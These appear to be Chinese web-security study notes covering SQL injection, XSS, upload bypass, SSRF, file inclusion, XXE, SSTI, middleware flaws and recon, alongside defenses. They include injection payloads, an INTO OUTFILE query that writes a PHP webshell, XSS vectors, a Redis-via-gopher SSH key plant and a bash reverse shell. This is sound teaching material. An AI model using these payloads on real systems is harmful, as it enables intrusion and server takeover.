SQL注入

sql注入的原理

sql 注入攻擊是通過將惡意的 sql 查詢或添加語句插入到應用的輸入參數中，再在后臺 sql 服務器上解析

執(zhí)行進行的攻擊

sql注入的分類

頭部注入（ua，cookie，referer）

聯合注入

報錯注入

布爾盲注

時間盲注

堆疊注入寬字節(jié)注入

布爾注入原理

布爾盲注：根據注入信息返回true or fales 沒有任何報錯信息

時間盲注：界面返回值ture 無論輸入任何值，返回的情況都是正常的來處。加入特定的時間函數，通過

查看web頁面返回的時間差來判斷注入的語句是否正確。

常用函數

length(str)：返回str字符串的長度。

substr(str, pos, len)：將str從pos位置開始截取len長度的字符進 行返回。注意這里的pos位置是從1開始的，不是數組的0開始

mid(str,pos,len):跟上面的一樣，截取字符串

ascii(str)：返回字符串str的最左面字符的ASCII代碼值。

ord(str):同上，返回ascii碼

if(a,b,c) :a為條件，a為true，返回b，否則返回c，如if(1>2,1,0),返回0

查詢語句

1.首先我們需要判斷數據庫長度
' or Length(database()) = 8 #返回true說明數據庫長度為8

2.獲取數據庫名字

' or ord(mid(database(),1,1)) ='ascill值'#
依次獲取

3.獲取表的總數
' or (select count(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database() )= 2#

4.獲取表的長度(第一個表)
' or (select length(TABLE_NAME) from information_schema.TABLES where
TABLE_SCHEMA=database() limit 0,1 )= (猜測得長度)#

5.獲取表的內容
' or mid((select TABLE_NAME from information_schema.TABLES where
TABLE_SCHEMA=database() limit 0,1),1,1) = 'a' #

6.獲取表的字段的總數
' or (select count(COLUMN_NAME) from information_schema.COLUMNS where
TABLE_NAME=表名 ) = 8#8返回true說明有8個表

時間盲注函數

RLIKE
通過 rpad 或 repeat 構造長字符串，加以計算量打的 pattern，通過 repeat 的參數可以控制延時長短

sleep(duration)
睡眠時間為 duration 參數給定的秒數，然后返回0；若函數被中斷，返回1。

BENCHMARK(count, expr)
重復 count 次執(zhí)行表達式 expr。
可以被用于計算 MySQL 處理表達式的速度
結果值通常為0

笛卡爾積
SELECT count(*) FROM information_schema.columns A, information_schema.colums B,
information_schema.colums C;
通過復雜的運算達到延時

GET_LOCK(str, timeout)
使用字符串 str 給定的名字得到一個鎖，超時為 timeout 秒
局限：當前會話不會生效，只有新會話開啟，并且保持長連接（ mysql_pconnect函數來連接數據庫），才能生效

報錯注入函數

updatexml():是mysql對xml文檔數據進行查詢和修改的xpath函數

extractvalue()：是mysql對xml文檔數據進行查詢的xpath函數

and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

MySQL 5.1.5版本中添加了對XML文檔進行查詢和修改的函數，MySQL 5.1.5版本以下**的不能上述函

數進行報錯注入

并且，上述報錯注入函數有字符限制，最長32位

虛擬表主鍵重復報錯注入

報錯注入的原因是group by在向臨時表插入數據時，由于rand ()多次計算導致插入臨時表時主鍵重復，

從而報錯，又因為報錯前concat ()中的SQL語句或函數被執(zhí)行，所以該語句報錯且被拋出的主鍵是SQL

語句或函數執(zhí)行后的結果。

floor() + rand() + group by

select count(*) from information_schema.tables group by

concat(version(),floor(rand(0)*2));

exp():此函數返回e(自然對數的底)指數X的冪值，整數溢出報錯

and exp(~(select * from(select user())a));

geometrycollection()，multipoint()，polygon()，multipolygon()，linestring()，multilinestring()

函數對參數要求是形如(1 2,3 3,2 2 1)這樣幾何數據，如果不滿足要求，則會報錯

寬字節(jié)注入原理

像GB2312、GBK、GB18030、BIG5、Shift_JIS等這些編碼都是常說的寬字節(jié)，也就是只有兩字節(jié)

寬字節(jié)注入發(fā)生的位置就是PHP發(fā)送請求到MYSQL時字符集使用character_set_client設置值進行了一次

編碼。在使用PHP連接MySQL的時候，當設置“character_set_client = gbk”時會導致一個編碼轉換的問

題，也就是我們熟悉的寬字節(jié)注入

寬字節(jié)注入是利用mysql的一個特性，mysql在使用GBK編碼（GBK就是常說的寬字節(jié)之一，實際上只有

兩字節(jié)）的時候，會認為兩個字符是一個漢字（前一個ascii碼要大于128，才到漢字的范圍）

常見轉義函數：

1.replace（）：過濾 ' \ ，將 ' 轉化為 ' ，將 \ 轉為 \，將 " 轉為 " 。用思路一。

2.addslaches()：返回在預定義字符之前添加反斜杠（\）的字符串。預定義字符：' , " , \ 。用思路一

（防御此漏洞，要將 mysql_query 設置為 binary 的方式）

3.mysql_real_escape_string()：轉義下列字\x00 \n \r \ ' " \x1a

sql注入的bypass

繞過空格

注釋符/* */，tab，%a0，括號

引號繞過

使用十六進制

逗號繞過

在使用盲注的時候，需要使用到substr()，mid)，limit。這些子句方法都需要使用到逗號。
對于substr()和mid()這兩個方法都可以使用from to方式來嘗試繞過:

Select substr(database() from 1 for 1);
Select mid(database() from 1 for 1);

使用join:

Union select1,2 等價于  union select * from(select 1)a join (select 2)b

使用like:

Select ascii(mid(user(),1,1))=80 等價于 select user() like'r%'

對于limit可以使用offset來繞過:

Select * from news limit 0,1 等價于 select * from news limit 1 offset 0

比較符號(<>)繞過:

Greatest(): 返回最大值
使用N個參數，并返回N個參數中的最大值

Greatest(value1,value2,...)

Least(): 返回最小值
上面兩個函數的比較規(guī)則:

如果任何參數為NULL，則兩個函數都將立即返回NULL，不進行任何比較
如果在INT或REAL上下文中使用函數，或者所有參數都是整數值或REAL值，那么他們將分別作為INT或REAL來比較
如果參數有數字和字符串組成，則函數將他們作為數亨比較
如果至少有一個參數是非二進制(字符)字符串，則函數將參數作為非二進制字符串來比較在所有其他情況下，函數將作為二進制字符串進行比較

=繞過(like、rlike、regexp,<,>)

Or and xor not繞過(And == &&,Or == ||,Xor = |,Not = !)

sql注入的防御

采用一些過了函數過濾，或者黑白名單，還有就是預編譯

預編譯的原理

通俗的講，預編譯防止SQL注入的原理是提前編譯SQL語句，將所有的用戶輸入都當做『數據』，而非

『語法』，來防止sql語句的執(zhí)行從而防止sql注入(發(fā)生在后端)

缺點：

在PHP 5.3.6之前，PDO確實存在寬字節(jié)注入的問題

sql寫文件利用

條件

secure_file_priv=空

知道網站絕對路徑

有讀寫權限（或者有root權限最好）

讀取文件：load_file()

id=-1' union select 1,load_file('C:\\phpStudy\\PHPTutorial\\MySQL\\my.ini'),2 ---

寫入文件：使用函數：Into Outfile（能寫入多行，按格式輸出）和Into Dumpfile （只能寫入一行且沒

有輸出格式）

1')) union select 1,'<?php eval($_REQUEST[23]); ?>',3 into outfile 'D://1.php' ---

不能直接寫一句話木馬可以嘗試使用file_put_contents函數寫日志，再日志包含寫文件

mysql8新特性注入

VALUES關鍵字

VALUES是把一組一個或多個行作為表展示出來，返回的也是一個表數據。

TABLE關鍵字

TABLE始終顯示表的所有列

TABLE不允許對行進行任意過濾，即TABLE 不支持任何WHERE子句

XSS

xss原理

惡意攻擊者往Web頁面

里插入惡意JS代碼，當用戶瀏覽該頁之時，嵌入其中Web里面的JS代碼會被執(zhí)行，從而

達到惡意的特殊目的。

xss分類

1.反射型

非存儲型，就是通過get或者post請求時，被后端處理過數據，并且響應到前端頁面上

2.存儲型

XSS代碼被存儲到服務器上的數據庫里的某張表的字段里，或者頁面，或者某個上傳文件里

3.DOM型

僅僅在前段頁面進行DOM樹節(jié)點的修改操作的

xss常利用標簽

<script> alert("xss"); </script>

<img src=1 onerror=alert("xss");>

<input onfocus="alert('xss');">
//競爭焦點，從而觸發(fā)onbiur事件

<input onblur=alert('xss') autofocus><input autofocus>
//通過 autofocus 屬性執(zhí)行本身的focus事件，這個向量是使焦點自動跳轉到輸入元素上，觸發(fā)焦點事
件，無需用戶去觸發(fā)

<input onfocus="alert('xss');"autofocus>

<details ontoggle="alert('xss');"></details>
// 使用open屬性觸發(fā)ontoggle事件，無需用戶去觸發(fā)

<details open ontoggle="alert('xss');"></details>

<svg onload="alert('xss')"></svg>>

<select onfocus=alert('xss')></select>
// 通過autofocus 屬性執(zhí)行本身的focus事件，這個向量是使焦點自動跳轉到輸入元素上，觸發(fā)焦點事
件，無需用戶去觸發(fā)

<select onfocus="alert('xss')" autofocus></select>

<iframe onload=alert("xss");></iframe>

<video><source onerror="alert('xss')"></video>

<audio src="x" onerror=alert('xss');></audio>

<body onload=alert('xss');></body>

防范xss攻擊的方式

防范XSS攻擊行為，一般有三種方式，一是對輸入內容和URL參數進行過濾，二是對動態(tài)輸出的內容進行

編碼，使該腳本無法生效。三是對Cookie設置`http-only使js無法對Cookie進行操作。（需要在HTTP頭

部配上，set-cookie： http-only 這個屬性可以 防止XSS,它會禁止javascript腳本來訪問cookie）

文件上傳

文件上傳漏洞原理

上傳的文件能夠被web容器解釋執(zhí)行。所以文件上傳后所在的目錄要是web容器所覆蓋到的路徑。

其次，用戶能夠從web訪問這個文件。

文件上傳漏洞bypass

一般都是在網頁上寫一段 javascript 腳本，校驗上傳文件的后綴名，有白名單形式也有黑名單形式。判

斷方式：在瀏覽加載文件，但還未點擊上傳按鈕時便彈出對話框

黑名單繞過

這里修改文件名字后，請求頭中的 Content-Length 的值也要改。

（1）黑名單檢測：一般有個專門的 blacklist 文件，里面會包含常見的危險腳本文件。

繞過方法：

（1）找黑名單擴展名的漏網之魚 - 比如 iis6.0 中的 asa 和 cer 
（2）可能存在大小寫繞過漏洞 - 比如aSp(iis6.0 中可以）和 pHp（只能在小于php5.3.39 中的 linux 中）之中 
（3）能被web容器解析的文件其他擴展名列表：jsp,jspx,jspf,asp,asa,cer,cdx,htr,xml,html,aspx,ashx,asmx,asax,ascx

（2）黑名單特殊后綴名繞過（利用難度高）

將Burpsuite截獲的數據包中backlion.php名字改為 baclion.php4(php1,php2,php3,php4,php5), 前提

條件是 http.conf 中設置 AddType application/x-httpd-php .php1(php 的版本小于等于 5.3.29 以下)

（3）單雙重后綴名繞過

上傳時將 Burpsuite 截的數據包中文件名 backlion.php（backlion.asa)改 為

backlion.pphphph(backlion.asasaa)，那么過濾了第一個"php"字符串"后， 開頭的'p'和結尾的'hp'就組

合又形成了 php

（4）服務端 MIME 文件類型(Content-Type)繞過

白名單繞過

（1）配合web容器的解析漏洞：

IIS中的目錄解析漏洞和分號解析漏洞 ：

將一句話木馬的文件名 backlion.php，改成 backlion.php.abc(奇怪的不被解析的后綴名都 行)。首先，

服務器驗證文件擴展名的時候，驗證的是.abc，只要該擴展名符合服務器端黑白名單觃則，即可上傳。

nginx 空字節(jié)漏洞 xxx.jpg%00.php 這樣的文件名會被解析為php代碼運行。

apache 的解析漏洞，上傳如 a.php.rar a.php.gif 類型的文件名，可以避免 對于php文件的過濾機制，

但是由于 apache 在解析文件名的時候是從右向左讀，如果遇到不能識別的擴展名則跳過，rar 等擴展名

是 apache 不能識別的， 因此就會直接將類型識別為 php，從而達到了注入php代碼的目的。

（2）%00 截斷上傳繞過

通過抓包截斷將 backlion.asp.jpg 后面的一個.換成%00 在上傳的時候即 backlion.asp%00.jpg，當文件

系統(tǒng)讀到%00 時，會認為文件已經結束，從而將 backlion.asp.jpg 的內容寫入到 backlion.asp 中，從而

達到攻擊的目的。%00 不是針對所有基于白名單的后綴名檢查都能繞過，代碼的實現過程中必須存在截

斷上傳漏洞，上傳格式如下：bk.asp%00.jpg

（3）文件頭內容檢測繞過

文件頭簡介

不同的圖片文件都有不同文件頭，如： PNG：文件頭標識 (8 bytes) 89 50 4E 47 0D 0A 1A 0A JPEG：

文件頭標識 (2 bytes): 0xff, 0xd8 (SOI) (JPEG 文件標識) GIF：文件頭標識 (6 bytes) 47 49 46 38 39(37)

61 上傳文件的時候會檢查上傳文件是否合法，如圖片文件是否文件頭含有 gif89, 這里可以通過一句話圖

片木馬生成工具 edjpgcom 戒者通過編輯器在木馬內容基礎上再加了一些文件信息，有點像下面的結構:

文件上傳防御

1. 客戶端檢測，使用 js 對上傳圖片檢測，包括文件大小、文件擴展名、文件類型等

2. 服務端檢測，對文件大小、文件路徑、文件擴展名、文件類型、文件內容檢測、對文件重命名等

3. 服務器端上傳目錄設置不可執(zhí)行權限

4. 檢查網站有沒有文件解析漏洞和文件包含漏洞

5. 將文件上傳到單獨的文件服務器，并且單獨設置文件服務器的域名

CSRF

CSRF的原理

攻擊者盜用了你的身份，以你的名義發(fā)送惡意請求，對服務器來說這個請求是完全合法的，但是卻完成

了攻擊者所期望的一個操作，比如以你的名義發(fā)送郵件、發(fā)消息，盜取你的賬號，添加系統(tǒng)管理員，甚

至于購買商品、虛擬貨幣轉賬等。

CSRF的檢測

最簡單的方法就是抓取一個正常請求的數據包，去掉Referer字段后再重新提交，如果該提交還有效，那

么基本上可以確定存在CSRF漏洞。

以CSRFTester工具為例，CSRF漏洞檢測工具的測試原理如下：使用CSRFTester進行測試時，首先需要

抓取我們在瀏覽器中訪問過的所有鏈接以及所有的表單等信息，然后通過在CSRFTester中修改相應的表

單等信息，重新提交，這相當于一次偽造客戶端請求。如果修改后的測試請求成功被網站服務器接受，

則說明存在CSRF漏洞，當然此款工具也可以被用來進行CSRF攻擊。

CSRF的防御

目前防御 CSRF 攻擊主要有三種策略：

1. 驗證 HTTP Referer 字段；

2. 在請求地址中添加 token 并驗證；

3. 在 HTTP 頭中自定義屬性并驗證。

在于在請求中放入黑客所不能偽造的信息，并且該信息不存在于 cookie 之中。可以在 HTTP 請求中以參

數的形式加入一個隨機產生的 token（可以是JWT），并在服務器端建立一個攔截器來驗證這個 token，

如果請求中沒有 token 或者 token 內容不正確

SSRF

ssrf原理

1.服務端提供了從其他服務器應用獲取數據的功能

2.沒有對目標地址做過濾與限制

比如從指定URL地址獲取網頁文本內容，加載指定地址的圖片，下載文件等等

ssrf漏洞發(fā)現

具體可能出現SSRF的地方：

? 1.社交分享功能：獲取超鏈接的標題等內容進行顯示

? 2.轉碼服務：通過URL地址把原地址的網頁內容調優(yōu)使其適合手機屏幕瀏覽

? 3.在線翻譯：給網址翻譯對應網頁的內容

? 4.圖片加載/下載：例如富文本編輯器中的點擊下載圖片到本地；通過URL地址加載或下載圖片

? 5.圖片/文章收藏功能：主要網站會取URL地址中title以及文本的內容作為顯示以求一個好的用戶體驗

? 6.云服務廠商：它會遠程執(zhí)行一些命令來判斷網站是否存活等，所以如果可以捕獲相應的信息，就可以

進行SSRF測試

? 7.網站采集，網站抓取的地方：一些網站會針對你輸入的url進行一些信息采集工作

? 8.數據庫內置功能：數據庫的比如mongodb的copyDatabase函數

? 9.郵件系統(tǒng)：比如接收郵件服務器地址

? 10.編碼處理, 屬性信息處理，文件處理：比如ffpmg，ImageMagick，docx，pdf，xml處理器等

? 11.未公開的api實現以及其他擴展調用URL的功能：可以利用google 語法加上這些關鍵字去尋找SSRF漏

洞，一些的url中的關鍵字：share、wap、url、link、src、source、target、u、3g、display、

sourceURl、imageURL、domain……

? 12.從遠程服務器請求資源（upload from url 如discuz??；import & expost rss feed 如web blog；使

用了xml引擎對象的地方 如wordpress xmlrpc.php）

ssrf驗證

1、因為SSRF漏洞是構造服務器發(fā)送請求的安全漏洞，所以我們可以通過抓包分析發(fā)送的請求是否是由

服務器端發(fā)送的來判斷是否存在SSRF漏洞

2、在頁面源碼中查找訪問的資源地址，如果該資源地址類型為http://www.xxx.com/a.php?image=(地

址)的可能存在

ssrf漏洞利用

未授權打redis

SSRF 攻擊的話并不能使用 redis-cli 來連接 Redis 進行攻擊操作，未授權的情況下可以使用 dict 或者

gopher 協(xié)議來進行攻擊，因為 gopher 協(xié)議構造比較繁瑣，建議直接使用 DICT 協(xié)議

dict://x.x.x.x:6379/<Redis 命令>

有認證打redis

配合本地文件包含先成功讀取到 /etc/redis.conf 配置文件，直接搜索 requirepass關鍵詞來定位尋找密

碼

302重定向打redis

利用web服務上的SSRF漏洞訪問在另一臺服務器上的302跳轉，302跳轉的Location 數據為：

gopher://127.0.0.1:6379/_[Redis偽造數據]，Redis偽造的數據為向 /root/.ssh/保存authorized_keys文

件，文件內容為攻擊機的SSH公鑰。這樣攻擊機就可通過SSH直接連接漏洞機。

當返回302時，只是臨時重定向，瀏覽器不會緩存數據

在自己的服務器上寫302 跳轉

在另一臺自己的服務器上寫一個302 重定向的代碼

<?php header("Location: gopher>

FILE 協(xié)議獲取本地信息

我們可以嘗試配合 file 協(xié)議來讀取本地的文件信息，嘗試使用 file 協(xié)議來讀取 /etc/passwd

探測內網端口

SSRF 常配合 DICT 協(xié)議探測內網端口開放情況，但不是所有的端口都可以被探測，一般只能探測出一些

帶 TCP 回顯的端口，具體可以探測哪些端口需要大家自己動手去測試一下，BP 下使用迭代器模式爆

破，設置好要爆破的 IP 和 端口即可批量探測出端口開放的信息

目錄掃描

內網 Web 資產進行目錄掃描的話，使用傳統(tǒng)的 dirsearch 等工具就不是很方便了，使用的是 Burpsuite

抓包，然后導入字典批量遍歷路徑參數

命令執(zhí)行

經典的命令執(zhí)行，通過 POST 方式攻擊者可以隨意利用 Linux 命令拼接符 ip 參數，從而導致任意命令執(zhí)行

ssrf危險函數

file_get_contents()

fsockopen()

PHP fsockopen需要 PHP.ini 中allow_url_fopen選項開啟。

curl_exec()

前端傳進來的url被后臺使用curl_exec()進行了請求,然后將請求的結果又返回給了前端。

ssrf的繞過

ip協(xié)議轉換

短網址繞過（有生成短網址的網站）

利用302跳轉

ssrf的防御

只允許發(fā)起HTTP(S)協(xié)議的請求；

限制訪問端口；

限制不能訪問內網IP；

特殊符號和字符過濾；

設置白名單/黑名單；

文件包含

相關函數

1. include()如果出錯的話，只會提出警告，會繼續(xù)執(zhí)行后續(xù)語句。

2. include_once()

3. require()如果在包含的過程中有錯，比如文件不存在等，則會直接退出，不執(zhí)行后續(xù)語句。

4. require_once()

遠程文件包含受allow_url_fopen = On和allow_url_include = On這兩個的影響。本地文件包含不受影響

相關偽協(xié)議

php://input 是個可以訪問請求的原始數據的只讀流。 POST 請求的情況下，最好使用 php://input 來代

替 $HTTP_RAW_POST_DATA，因為它不依賴于特定的 php.ini 指令。 而且，這樣的情況下

$HTTP_RAW_POST_DATA 默認沒有填充， 比激活 always_populate_raw_post_data 潛在需要更少的內

存。 enctype="multipart/form-data" 的時候 php://input 是無效的。

php://filter 是一種元封裝器， 設計用于數據流打開時的篩選過濾應用。 這對于一體式（all-in-one）的

文件函數非常有用，類似 readfile()、 file()和 file_get_contents()， 在數據流內容讀取之前沒有機會應用

其他過濾器。

file:// — 訪問本地文件系統(tǒng)

ftp:// -- ftps:// — 訪問 FTP(s) URLs

zip://：可以訪問壓縮包里的文件。當他與包含函數結合時，zip://流會被當做php文件執(zhí)行。

phar://這個就是php解壓縮報的一個函數，不管后綴是什么，都會當做壓縮包來解壓，用法：?

file=phar://壓縮包/內部文件 phar://xxx.png/shell.php 注意 PHP>=5.3.0壓縮包需要是zip協(xié)議壓縮，

rar不行，將木馬文件壓縮后，改為其他任意格式的文件都可以正常使用。步驟：寫一個一句話木馬

shell.php，然后用zip協(xié)議解壓縮為shell.zip。然后將后綴改為png等其他格式

文件包含分類

包含session

利用條件：session文件路徑已知，且其中內容部分可控。

php的session文件的保存路徑可以在phpinfo的session.save_path看，然后用

session.upload_progress將木馬寫入session文件

包含日志

利用條件：需要知道服務器日志的存儲路徑，且日志文件可讀。

apache+Linux日志默認路徑：/etc/httpd/logs/access.log或/var/log/httpd/access.log

2.apache+win2003日志默認路徑：D:\xampp\apache\logs\access.log、
D:\xampp\apache\logs\error.log

包含environ

利用條件：

php以cgi方式運行，這樣environ才會保持UA頭。

environ文件存儲位置已知，且environ文件可讀。environ文件默認位置：/proc/self/environ。在Linux

系統(tǒng)下(FreeBSD是沒有這個的)。Windows系統(tǒng)沒有。

proc/self/environ中會保存user-agent頭。如果在user-agent中插入php代碼，則php代碼會被寫入到

environ中。之后再包含它，即可。

包含fd

文件描述符：File descriptor,簡稱fd，當應用程序請求內核打開/新建一個文件時，內核會返回一個文件

描述符用于對應這個打開/新建的文件，其fd本質上就是一個非負整數。實際上，它是一個索引值，指向

內核為每一個進程所維護的該進程打開文件的記錄表。當程序打開一個現有文件或者創(chuàng)建一個新文件

時，內核向進程返回一個文件描述符。

默認位置：/proc/self/fd/。在Linux系統(tǒng)下。Windows系統(tǒng)沒有。

包含臨時文件

php中上傳文件，會創(chuàng)建臨時文件。在linux下使用/tmp目錄，而在windows下使用c:\winsdows\temp

目錄。在臨時文件被刪除之前，利用競爭即可包含該臨時文件。

由于包含需要知道包含的文件名。一種方法是進行暴力猜解，linux下使用的隨機函數有缺陷，而

window下只有65535種不同的文件名，所以這個方法是可行的。

另一種方法是配合phpinfo頁面的php variables，可以直接獲取到上傳文件的存儲路徑和臨時文件名，

直接包含即可

條件：存在phpinfo界面和文件包含

原理：

1.當我們給PHP發(fā)送POST數據包時，如果數據包里包含文件區(qū)塊，PHP就會將文件保存成一個臨時文

件，路徑通常為：/tmp/php[6個隨機字符],這個臨時文件，在請求結束后就會被刪除。

2.因為phpinfo頁面會將請求上下文中的所有變量打出來，所以我們如果向phpinfo頁面發(fā)送包含文件區(qū)

塊的數據包，就可以在返回包里找到臨時文件名，也就是$_FILES變量中的內容。

文件包含的防御

1. 在很多場景中都需要去包含web目錄之外的文件，如果php配置了open_basedir，則會包含失敗。

所以PHP 中使用open_basedir配置限制訪問在指定的區(qū)域。

2. 做好文件的權限管理。

3. 對可以包含的文件進行限制，可以采用白名單的方式，或設置可以包含的目錄。

4. 對危險字符進行過濾，比如過濾.（點）/（反斜杠）\（反斜杠）等特殊字符。

5. 盡量將allow_url_fopen和allow_url_include配置為off，不過像有些偽協(xié)議還是能使用，不過能盡

量off還是off吧。

6. 盡量不使用動態(tài)包含等等

XXE

xxe原理

XXE漏洞發(fā)生在應用程序解析XML輸入時，沒有禁止外部實體的加載，導致可加載惡意外部文件，造成

文件讀取、命令執(zhí)行、內網端口掃描、攻擊內網網站、發(fā)起dos攻擊等危害。xxe漏洞觸發(fā)的點往往是可

以上傳xml文件的位置，沒有對上傳的xml文件進行過濾，導致可上傳惡意xml文件。

注：最直接的方法就是用burp抓包，然后，修改HTTP請求方法，修改Content-Type頭部字段等等，查

看返回包的響應，看看應用程序是否解析了發(fā)送的內容，一旦解析了，那么有可能XXE攻擊漏洞

xxe防御

1. 禁用外部實體

2. 過濾和驗證用戶提交的XML數據

3. 不允許XML中含有任何自己聲明的DTD

4. 有效的措施：配置XML parser只能使用靜態(tài)DTD，禁止外來引入；對于Java來說，直接設置相應的

屬性值為false即可

SSTI

ssti原理

SSTI也就是服務器端模板注入攻擊（Server-Side Template Injection），和SQL注入差不多，也是由于

沒有安全地處理用戶輸入造成的安全問題。簡單來說，其實質是服務端接收了用戶的輸入，但沒有進行

嚴格的過濾就將用戶的輸入直接帶入了編譯渲染過程。這樣在這個過程中如若用戶輸入的內容存在一些

惡意代碼，就有可能會被執(zhí)行。

攻擊方式

base:對象的一個基類，一般情況下是object

mro:獲取對象的基類，只是這時會顯示出整個繼承鏈的關系，是一個列表，object在最底層所以在列表

中的最后，通過mro[-1]可以獲取到

subclasses() :繼承此對象的子類，返回一個列表

考察SSTI的CTF題目一般都是給個變量，因為有這些類繼承的方法，便可以從任何一個變量，回溯到基

類中去，再獲得到此基類所有實現的類，這便是攻擊方式：

從變量->對象->基類->子類遍歷->全局變量

原型鏈污染

原型鏈污染的核心機制在于，當我們調用對象某一屬性，它首先會從obj中尋找，如果沒有找到，則會向

上在obj.proto中尋找，如果仍未找到則會繼續(xù)向上，從obj.proto.proto__查找，直到查找到元素或查

找到Object類為止

中間件漏洞

IIS

1、PUT漏洞

IIS Server 在 Web 服務擴展中開啟了 WebDAV ，配置了可以寫入的權限，造成任意文件上傳。

版本： IIS6.0

2、短文件名猜解

IIS的短文件名機制，可以暴力猜解短文件名，訪問構造的某個存在的短文件名，會返回404，訪問構造

的某個不存在的短文件名，返回400。

3、遠程代碼執(zhí)行

在IIS6.0處理PROPFIND指令的時候，由于對url的長度沒有進行有效的長度控制和檢查，導致執(zhí)行

memcpy對虛擬路徑進行構造的時候，引發(fā)棧溢出，從而導致遠程代碼執(zhí)行。

4、解析漏洞

IIS 6.0 在處理含有特殊符號的文件路徑時會出現邏輯錯誤，從而造成文件解析漏洞。這一漏洞有兩種完

全不同的利用方式：

/test.asp/test.jpg 		test.asp;.jpg

第一種是新建一個名為 "test.asp" 的目錄，該目錄中的任何文件都被 IIS 當作 asp 程序執(zhí)行（特殊符號

是 “/” ）

第二種是上傳名為 "test.asp;.jpg" 的文件，雖然該文件真正的后綴名是 ".jpg", 但由于含有特殊符號 ";"

，仍會被 IIS 當做 asp 程序執(zhí)行

IIS7.5

php 又默認開啟 "cgi.fix_pathinfo", 會對文件進行 “ 修理 ” ，可謂 “ 修理 ” ？舉個例子，當 php 遇到路徑

"/aaa.xxx/bbb.yyy" 時，若 "/aaa.xxx/bbb.yyy" 不存在，則會去掉最后的 “bbb.yyy" ，然后判斷

"/aaa.xxx" 是否存在，若存在，則把 “/aaa.xxx" 當作文件。

Apache

1、解析漏洞

Apache默認一個文件可以有多個以點分隔的后綴，當右邊的后綴無法識別（不在mime.tyoes內），則

繼續(xù)向左識別

AddHandler application/x-httpd-php .php的配置文件配置錯誤

2、目錄遍歷

apache配置文件httpd.conf 找到Options+Indexes+FollowSymLinks +ExecCG配置錯誤

Nginx

1、文件解析

對任意文件名，在后面添加/任意文件名.php的解析漏洞，比如原本文件名是test.jpg，可以添加

test.jpg/x.php進行解析攻擊。

/etc/php5/fpm/pool.d/www.conf中security.limit_extensions = .php配置錯誤

2、目錄遍歷

/etc/nginx/sites-avaliable/default里的autoindex on配置錯誤

3、CRLF注入

CRLF時“回車+換行”（\r\n）的簡稱。

HTTP Header與HTTP Body時用兩個CRLF分隔的，瀏覽器根據兩個CRLF來取出HTTP內容并顯示出來。

通過控制HTTP消息頭中的字符，注入一些惡意的換行，就能注入一些會話cookie或者html代碼，由于

Nginx配置不正確，導致注入的代碼會被執(zhí)行。

4、目錄穿越

Nginx反向代理，靜態(tài)文件存儲在/home/下，而訪問時需要在url中輸入files，配置文件中/files沒有用/

閉合，導致可以穿越至上層目錄。

Tomcat

1、遠程代碼執(zhí)行

Tomcat 運行在Windows 主機上，且啟用了 HTTP PUT 請求方法，可通過構造的攻擊請求向服務器上傳

包含任意代碼的 JSP 文件，造成任意代碼執(zhí)行。

影響版本： Apache Tomcat 7.0.0 – 7.0.81

2、war后門文件部署

Tomcat 支持在后臺部署war文件，可以直接將webshell部署到web目錄下。

若后臺管理頁面存在弱口令，則可以通過爆破獲取密碼。

jBoss

1、反序列化漏洞

jBoss是一個基于J2EE的開發(fā)源代碼的應用服務器。 JBoss代碼遵循LGPL許可，可以在任何商業(yè)應用中免

費使用。JBoss是一個管理EJB的容器和服務器，支持EJB1.1、EJB 2.0和EJB3的規(guī)范。但JBoss核心服務不

包括支持servlet/JSP的WEB容器，一般與Tomcat或Jetty綁定使用。

2、war后門文件部署

jBoss后臺管理頁面存在弱口令，通過爆破獲得賬號密碼。登陸后臺上傳包含后門的war包。

WebLogic

1、反序列化漏洞

Java序列化，簡而言之就是把java對象轉化為字節(jié)序列的過程。而反序列話則是再把字節(jié)序列恢復為java

對象的過程，然而就在這一轉一變得過程中，程序員的過濾不嚴格，就可以導致惡意構造的代碼的實

現。

2、SSRF

Weblogic 中的SearchPublicRegistries.jsp存在一個SSRF漏洞，利用該漏洞可以發(fā)送任意HTTP請求，進

而攻擊內網中redis、fastcgi等脆弱組件。

3、任意文件上傳

通過訪問config.do配置頁面，先更改Work Home工作目錄，用有效的已部署的Web應用目錄替換默認

的存儲JKS Keystores文件的目錄，之后使用"添加Keystore設置"的功能，可上傳惡意的JSP腳本文件。

4、war后門文件部署

由于WebLogic后臺存在弱口令，可直接登陸后臺上傳包含后門的war包。

其它中間件相關漏洞

1、FastCGI未授權訪問、任意命令執(zhí)行

服務端使用fastcgi協(xié)議并對外網開放9000端口，可以構造fastcgi協(xié)議包內容，實現未授權訪問服務

端.php文件以及執(zhí)行任意命令。

2、PHPCGI遠程代碼執(zhí)行

在apache調用php解釋器解釋.php文件時，會將url參數傳我給php解釋器，如果在url后加傳命令行開

關（例如-s、-d 、-c或-dauto_prepend_file%3d/etc/passwd+-n）等參數時，會導致源代碼泄露和任意

代碼執(zhí)行。

php反序列化漏洞

魔法函數

__construct() 當一個對象創(chuàng)建時被調用，反序列化不觸發(fā)
__destruct() 當一個對象銷毀時被調用
__toString() 當一個對象被當作一個字符串使用，比如echo輸出或用 . 和字符串拼接
__call() 當調用的方法不存在時觸發(fā)
__invoke() 當一個對象被當作函數調用時觸發(fā)
__wakeup() 反序列化時自動調用
__get() 類中的屬性私有或不存在觸發(fā)
__set() 類中的屬性私有或不存在觸發(fā)

反彈shell

bash -i >& /dev/tcp/ip/端口 0>&1

bash -i 打開一個交互式的bash

/dev/tcp/是Linux中的一個特殊設備，打開這個文件就相當于發(fā)出了一個socket調用，建立一個socket

連接，讀寫這個文件就相當于在這個socket連接中傳輸數據。

文件描述符

已知Linux下存在三種文件描述符：

0 - stdin 標準輸入，使用< 或 <<

1 - stdout 標準輸出，使用> 或 >>

2 - stderr 標準錯誤輸出，使用2或者2>>

&>的含義

反彈shell中的&沒有固定含義，放在>后面的&，表示重定向的目標不是一個文件，而是一個文件描述符。

當>&后面接文件時，表示將標準輸出和標準錯誤輸出重定向到文件

當>&后面接文件描述符時，表示將前面的文件描述符重定向到后面的文件描述符

內網滲透

一個目標怎么信息收集？

搜索引擎

Google搜索、Shodan搜索、FOFA搜索

信息收集工具：Maltego

可收集：域名郵箱、人員、地址

DNS分析

域名注冊信息：whois

子域名：Layer子域名挖掘機、onlietools、dnsmap、fierce

真實IP地址  超級ping

網站架構

服務組件和腳本類型:Wappalyzer 、whatweb
服務器類型:nmap
CMS類型:onlinetools
WAF:WAF、wafoof

旁站和C段

onlinetools、webscan

后臺目錄

御劍目錄掃描、7kbstorm、dirb

端口

nmap zenmap

漏洞掃描

AWVS Nessus

一個不出網機器怎么打

